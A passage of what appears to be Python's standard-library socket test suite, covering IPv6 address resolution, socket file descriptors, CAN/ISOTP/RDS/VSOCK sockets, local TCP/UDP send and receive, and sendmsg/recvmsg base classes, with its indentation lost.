srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(os.path.join(tmpdir, 'socket'))
self._test_socket_fileno(s, socket.AF_UNIX, socket.SOCK_STREAM)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
